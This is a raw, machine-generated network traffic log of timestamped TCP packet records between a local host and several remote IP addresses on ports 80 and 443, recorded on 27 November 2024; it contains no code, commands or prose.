                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.900618076 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.902080059 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.902132034 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.902174950 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.902224064 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.903669119 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.903721094 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.903785944 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.903830051 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.905292034 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.905397892 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.905401945 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.905539036 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.906835079 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.906881094 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.906951904 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.907010078 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.908397913 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.908454895 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.908535957 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.908584118 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.910007000 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.910052061 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.910103083 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.910146952 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.911463022 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.911601067 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.911606073 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.911747932 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.913021088 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.913070917 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.913070917 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.913127899 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.914544106 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.914592981 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.914659023 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.914717913 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.916129112 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.916234016 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.916325092 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.917517900 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.917587042 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.917623043 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.917717934 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.919004917 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.919058084 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.919090033 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.919205904 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.920070887 CET49830443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.920491934 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.920547962 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.920572042 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.920665979 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.922051907 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.922135115 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.922221899 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.922276020 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.923408031 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.923460960 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.923518896 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.923569918 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.924921989 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.924982071 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.925038099 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.925157070 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.926337957 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.926384926 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.926429033 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.926467896 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.927763939 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.927841902 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.927894115 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.927979946 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.929238081 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.929291010 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.929303885 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.929357052 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.930633068 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.930692911 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.930731058 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.930769920 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.932081938 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.932127953 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.932188034 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.932255030 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.933487892 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.933532953 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.933614016 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.933654070 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.935039997 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.935064077 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.935113907 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.935113907 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.935188055 CET49831443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.936352015 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.936403036 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.936477900 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.936528921 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.937793970 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.937858105 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.937916040 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.937982082 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.938807011 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.939021111 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.939033985 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.939220905 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.939342976 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.939455986 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.940372944 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.940577030 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.940651894 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.940701962 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.940768003 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.940926075 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.941399097 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.941464901 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.941545010 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.941553116 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.942104101 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.942154884 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.942176104 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.942228079 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.943542004 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.943655968 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.943670988 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.943696976 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.944993973 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.945043087 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.945081949 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.945169926 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.946378946 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.946446896 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.946512938 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.946604013 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.947817087 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.947864056 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.947912931 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.947973967 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.949285984 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.949341059 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.949384928 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.949538946 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950162888 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950649977 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950690031 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950701952 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950727940 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950751066 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950798035 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.950885057 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.951184034 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.951190948 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.951199055 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.951219082 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.951956987 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.951962948 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.952127934 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.952234030 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.952289104 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.953547955 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.953598022 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.953650951 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.953696966 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.954988003 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.955039024 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.955111027 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.955169916 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.956383944 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.956427097 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.967741013 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.967850924 CET44349832162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.967917919 CET49832443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:41.999476910 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.000004053 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.000021935 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.000478029 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.000483036 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.002311945 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.002713919 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.002729893 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.003084898 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.003088951 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.050434113 CET49830443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.050530910 CET44349830172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.050601959 CET49830443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067126989 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067157984 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067192078 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067233086 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067679882 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067730904 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067781925 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.067836046 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.068738937 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.068806887 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.068809032 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.068890095 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.069883108 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.069900036 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.069931030 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.069969893 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.070823908 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.070933104 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.070995092 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.071897984 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.071954966 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.071985006 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.072025061 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.072936058 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.072992086 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.073044062 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.073288918 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.073982000 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.074042082 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.074084044 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.074125051 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.075062037 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.075114012 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.075134993 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.075176954 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.076014996 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.076066971 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.076116085 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.076157093 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.077033043 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.077162981 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.077274084 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.078042984 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.078100920 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.078149080 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.078197002 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.079070091 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.079127073 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.079175949 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.079212904 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.080079079 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.080130100 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.080188990 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.081043959 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.081123114 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.081162930 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.081238985 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.081320047 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.082106113 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.082164049 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.082185984 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.082232952 CET4978580192.168.2.7185.215.113.206
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.083112955 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.083142996 CET8049785185.215.113.206192.168.2.7
                                                                                                                                                                                                                                                                                                                    Nov 27, 2024 09:06:42.083169937 CET4978580192.168.2.7185.215.113.206
